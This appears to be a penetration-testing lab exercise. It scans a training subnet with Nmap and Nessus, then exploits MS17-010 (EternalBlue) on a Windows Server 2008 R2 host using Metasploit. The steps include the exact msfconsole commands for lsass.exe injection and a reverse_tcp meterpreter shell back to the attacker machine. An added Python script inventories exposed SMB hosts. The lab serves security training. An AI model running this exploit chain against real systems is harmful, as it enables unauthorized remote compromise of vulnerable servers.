Exercise 9: Exploiting Windows OS Vulnerability
Scenario
Once attackers have the information related to network devices, they can use it as an entry point to a network for a comprehensive attack and perform many types of attacks ranging from DoS attacks to unauthorized administrative access.
As an expert penetration tester, you must understand how vulnerabilities, compliance specifications, and content policy violations are scanned using the Nessus tool.
Lab Duration: 30 Minutes
- Click Kali Linux (Internal Network). If the Kali Linux lock screen appears, click on the screen and press Enter. If it does not appear, skip to the next task.
- Type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- In this lab, we will be scanning a subnet for live machines. Select one machine and pentest the machine to gain access to it.
For doing a quick scan, we will do a ping sweep using Nmap. In this lab, we are choosing an internal network (Subnet D) for pentesting.
Launch a command line terminal, type nmap -sP 172.20.20.1-255 and press Enter.
This displays all the hosts that are up in the network within a minute. In this lab, we are choosing 172.20.20.9 (Advertisement Dept. Subnet D) as our target.
- Now, we shall scan the Advertisement Dept. Subnet D machines to view the open ports, services running along with their versions, and the underlying operating system.
Type nmap -T4 -A 172.20.20.9 and press Enter.
Nmap takes approximately 3 minutes to complete the scan. When it finishes, you will observe that port 445 is open and the underlying operating system is Windows Server 2008 R2.
Close the terminal.
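As an added example that is not part of the original lab, the following Python script turns the Nmap results above into a repeatable SMB-exposure inventory: it parses Nmap's XML output (produced with `-oX`) and lists each live host with TCP 445 open together with Nmap's best OS guess, which is the defender-side view of the same data the scan gives an attacker. The embedded XML is a constructed sample modelled on the lab subnet, not the real scan output.

```python
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -oX` output, modelled on the lab subnet
# (hypothetical results, not the lab's actual scan).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/><address addr="172.20.20.9" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="445"><state state="open"/>
        <service name="microsoft-ds" product="Microsoft Windows Server 2008 R2 - 2012 microsoft-ds"/>
      </port>
    </ports>
    <os><osmatch name="Microsoft Windows Server 2008 R2" accuracy="97"/>
        <osmatch name="Microsoft Windows 7" accuracy="90"/></os>
  </host>
  <host><status state="up"/><address addr="172.20.20.12" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="filtered"/></port></ports>
  </host>
  <host><status state="down"/><address addr="172.20.20.30" addrtype="ipv4"/></host>
</nmaprun>"""


def smb_exposed_hosts(nmap_xml, port="445"):
    """Return {ip: best OS guess} for every live host with TCP `port` open."""
    # Down hosts, closed/filtered ports and hosts without an IPv4 address are
    # skipped; a host with no osmatch (scanned without -O/-A) reports "unknown".
    exposed = {}
    for host in ET.fromstring(nmap_xml).findall("host"):
        status = host.find("status")
        addr = host.find("address[@addrtype='ipv4']")
        if status is None or status.get("state") != "up" or addr is None:
            continue
        is_open = any(
            p.get("protocol") == "tcp" and p.get("portid") == port
            and p.find("state") is not None and p.find("state").get("state") == "open"
            for p in host.findall("ports/port")
        )
        if not is_open:
            continue
        # Nmap may list several osmatch entries; keep the most accurate one.
        matches = [(int(m.get("accuracy", "0")), m.get("name", "unknown"))
                   for m in host.findall("os/osmatch")]
        exposed[addr.get("addr")] = max(matches)[1] if matches else "unknown"
    return exposed


if __name__ == "__main__":
    for ip, os_name in smb_exposed_hosts(SAMPLE_NMAP_XML).items():
        print(f"{ip}\tTCP/445 open\t{os_name}")
```

Run it against a real `nmap -A -oX scan.xml 172.20.20.0/24` file by reading the file into `smb_exposed_hosts` in place of the sample; hosts whose 445 shows as filtered (a firewall in the way) are deliberately not reported as exposed.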
- Now, we shall perform a vulnerability scan on Advertisement Dept. Subnet D using Nessus in Windows Server 2012 (Internal Network).
You may additionally look for pre-existing vulnerabilities associated with the identified version of services/operating system in searchsploit/exploit-db.
- Click Windows Server 2012 (Internal Network) and press Ctrl+Alt+Delete.
- In the Password field, type Pa$$w0rd and press Enter.
You can use the Type Password option from the Commands menu to enter the password.
- To launch the Firefox browser, double-click the Firefox icon on the Desktop.
You can also click the Firefox icon on the taskbar or launch it from the Start menu apps.
- The Firefox main window appears. Type https://localhost:8834 in the address bar and press Enter.
- A webpage appears stating that your connection is not secure. Click Advanced.
- Click Add Exception… button.
- Add Security Exception window appears; click Confirm Security Exception.
- The Nessus/Login page appears.
Type the following credentials and click Sign In:
Username: admin
Password: qwerty@123
If the login page does not appear, go to Control Panel --> Administrative Tools --> Services and restart the Tenable Nessus service. Once done, reload the webpage.
- After successful login, go to the Nessus Policies window and click the Create a new policy link.
If any notifications appear at the top right corner of the window, ignore them.
Nessus will automatically log off if you leave the browser window idle for 5 mins.
- Policy Templates window appears with Scanner Templates as shown in the screenshot below.
- In the Scanner section, click the Advanced Scan policy.
- Advanced Scan policy window appears displaying the Settings tab.
In the Basic settings under the General section, specify a policy name in the Name field (here, System_Scan) and give a description of the policy.
Once done, leave the Permissions section with the default setting and click on Discovery in the left pane.
In this lab, we will be scanning Advertisement Dept Subnet D machine (Windows Server 2008).
- Clicking DISCOVERY expands a list of three options: Host Discovery, Port Scanning, and Service Discovery. We will now configure the Host Discovery settings.
In the Host Discovery settings, toggle the Ping Remote Host option to turn it off.
Scroll down if you want to view the rest of the settings in Host Discovery module.
- In the Port Scanning module, check the Verify open TCP ports found by local port enumerators option.
Leaving the other settings to default, click ASSESSMENT from the left pane.
- Once you click the ASSESSMENT module, it will show you the General settings where you can see the Accuracy, Antivirus definition grace period, and SMTP options. Here you can leave the settings to default, and click Brute Force from the left pane.
- In the Brute Force settings, make sure that the Only use credentials provided by the user option is checked under the General Settings section, and then click the Web Applications module in the left pane.
- In the Web Applications module, if any web applications are hosted on the network, turn scanning on; otherwise leave the settings at default. Then click the Windows module in the left pane. In this lab, we have left the setting at default (turned off) because no web application is hosted on the target machine.
You can turn it on by toggling the Scan web applications switch.
- In the Windows module, make sure that Request Information about the SMB Domain is checked, and leave the other settings at default. Now click the REPORT module in the left pane.
You can also specify the Start UID and End UID in Enumerate Domain Users and Local Users.
- In the REPORT module, leave all the settings to default and click ADVANCED from the left pane.
- In the Advanced module, scroll down to Performance Options section and set the value for Max simultaneous hosts per scan as 100, Max number of concurrent TCP sessions per host as unlimited and Max number of concurrent TCP sessions per scan as unlimited. After configuring these options, scroll up the window and click on the Credentials module.
- In the Credentials module, it will display the Cloud Services, Database, Host, Miscellaneous, and Plaintext Authentication options. Here you can activate these options by choosing them from the left pane.
In this lab, we have kept the settings to default. Now, click on the Plugins module to view the available plugins.
- In the Plugins module, Nessus displays all the plugins and their information. Here you may choose plugins according to your target network and then click the Save button to save the new policy.
In this lab, we are not selecting any plugins.
- The created policy is now saved in the Policies section as shown in the screenshot below:
- To begin a new scan, click My Scans in the left pane.
- Click Create a New Scan link to create a new scan.
- Once you click the New Scan button, you are redirected to the Scan Templates window, where you select the policy you created.
The created policy is listed in the User Defined Policies section, so click the User Defined tab.
- The User Defined policy section appears; click the System Scan policy.
- The Settings section of the Scan Templates appears.
Set a name for the scan in the Name Text field (here, Advertisement Dept.), type a description for the scan in the Description field, leave the Folder field set to default and enter the IP address of Advertisement Dept. machine in the Targets text field (here, 172.20.20.9).
Click on the Schedule module in the left pane.
You can specify multiple machines to scan using Nessus. For lab demonstration, we are using a single machine.
- The Schedule section allows you to specify the frequency of the scan. In this section, you can specify how often you want Nessus to scan the target machine.
Leave this setting at default, click the Save drop-down menu and click Launch. This will launch a vulnerability scan on the Advertisement Dept. Subnet D machine.
- As soon as you click the Launch link, Nessus will begin the scan on the Advertisement Dept. Subnet D machine as shown in the screenshot below.
It will take around 10 minutes to scan the machine.
- Once the scan is completed, it will display a tickmark as shown in the screenshot.
- Click Advertisement Dept. to view the scan result.
- Click on 172.20.20.9 to view all the vulnerabilities associated with it.
- A list of vulnerabilities is displayed for this host as shown in the screenshot below:
- Click Export and select a format (here, HTML) in order to export the result.
- The Export as HTML pop-up appears, choose Executive Summary from the drop-down list and click on the Export button.
- A dialog box appears, asking you to either open or save the file. Click Save File and click OK.
- Now, click the folder icon (Open Containing Folder) in the notification popup that appears when the download completes.
The file is downloaded to the default download location of the browser, i.e., C:\Users\Administrator\Downloads.
- Double-click on the downloaded file to view the result.
If you are asked How do you want to open this type of file (.html)?, choose a web browser to view the report. In this lab, we are using the Firefox (1st icon in the list) browser.
- The generated report appears as shown in the screenshot. Click Show Details to view the complete details of the vulnerabilities.
Scroll down to analyze the complete report.
- Now, we shall choose a vulnerability found in the target machine and attempt to exploit it using a Metasploit module. In this lab, we shall exploit a recently discovered vulnerability (Eternal Blue) associated with MS17-010 (CVE-2017-0143). Before performing the exploitation, ensure that the victim machine Advertisement Dept. Subnet D is powered on.
Switch back to the Kali Linux (Internal Network) machine.
- Launch a Command Line Terminal from the taskbar.
- Type msfconsole command and press Enter to launch the Metasploit framework console.
Now, we shall check if the Advertisement Dept. Subnet D machine is vulnerable to Eternal Blue using smb_ms17_010 auxiliary scanner.
- Type use auxiliary/scanner/smb/smb_ms17_010 in the msfconsole and press Enter to use the module.
- Now, type set rhosts 172.20.20.9 and press Enter to set the target as Advertisement Dept. Subnet D.
- Type run and press Enter to check if the machine is vulnerable.
You will observe that Advertisement Dept. Subnet D (Windows Server 2008) is vulnerable to Eternal Blue as shown in the screenshot below:
- Now, we shall search for the Eternal Blue exploit. Type search eternal blue in the msfconsole and press Enter. This displays the scanner and the exploit associated with Eternal Blue as shown in the screenshot.
We will be using the eternalblue_doublepulsar exploit to compromise the target machine.
- Type use exploit/windows/smb/eternalblue_doublepulsar in msfconsole and press Enter.
- Now, type show options and press Enter to view all the options associated with the exploit.
- From the previous step we know that we need to set the values of RHOST, processinject and targetarchitecture. Setting the windows/x64/meterpreter/reverse_tcp payload increases the chance of gaining a meterpreter session.
Issue the following commands in the msfconsole:
- set rhost 172.20.20.9
- set processinject lsass.exe
- set targetarchitecture x64
- set payload windows/x64/meterpreter/reverse_tcp
- set lhost 172.20.20.21
172.20.20.21 is the IP address of the Kali Linux (Internal Network) machine.
- Since we have set the options required for the exploit module, we will now perform exploitation on the target machine by triggering the exploit.
So, type exploit and press Enter.
- A meterpreter session has been attained, meaning that we have successfully exploited the smb vulnerability in the target machine using the Eternal Blue exploit.
Sometimes, the options you set might not fetch you the meterpreter session. In such cases, you need to change the processinject and targetarchitecture values and perform the exploitation again.
If you change the targetarchitecture, you need to change the architecture of the payload as well.
- We have successfully exploited the SMB vulnerability found in the target machine. Take a screenshot of the screen that appeared in the previous step and save it to the respective pentesting directory.
You have successfully scanned a network for vulnerabilities.